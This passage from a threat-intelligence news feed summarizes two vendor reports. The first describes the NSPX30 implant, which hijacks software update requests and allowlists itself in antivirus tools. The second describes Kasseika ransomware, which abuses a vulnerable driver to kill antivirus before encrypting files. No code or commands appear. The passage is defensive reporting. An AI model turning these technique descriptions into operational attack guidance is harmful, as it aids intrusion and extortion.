(AitM) attacks hijacking update requests from legitimate software. The implant was detected in targeted attacks against Chinese and Japanese companies, as well as against individuals located in the United Kingdom. NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor. Both of the latter two have their own sets of plugins. The implant was designed around the attackers\' capability to conduct packet interception, enabling NSPX30 operators to hide their infrastructure. NSPX30 is also capable of allowlisting itself in several Chinese antimalware solutions. #### Reference URL(s) 1. https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/ #### Publication Date January 24, 2024 #### Author(s) Facundo Muñoz ]]> 2024-01-26T18:48:27+00:00 https://community.riskiq.com/article/48faa09a www.secnews.physaphae.fr/article.php?IdArticle=8443505 False None None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description The ransomware operation named \'Kasseika\' has adopted Bring Your Own Vulnerable Driver (BYOVD) tactics to disable antivirus software before encrypting files. Kasseika exploits the Martini driver, part of TG Soft\'s VirtIT Agent System, to disable antivirus products protecting the targeted system. Trend Micro discovered Kasseika in December 2023, noting its similarities with BlackMatter, suggesting it may have been built by former members or actors who purchased BlackMatter\'s code. The attack begins with a phishing email, stealing credentials for initial access, followed by the abuse of Windows PsExec tool for lateral movement. Kasseika utilizes BYOVD attacks to gain privileges, terminate antivirus processes, and execute its ransomware binary, demanding a Bitcoin ransom and providing victims with a decryption option within 120 hours. #### Reference URL(s) 1. https://www.trendmicro.com/en_us/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html #### Publication Date January 25, 2024 #### Author(s) TrendMicro Researchers ]]> 2024-01-25T20:18:28+00:00 https://community.riskiq.com/article/86b5ec3e www.secnews.physaphae.fr/article.php?IdArticle=8443135 False Ransomware,Tool,Prediction None 3.0000000000000000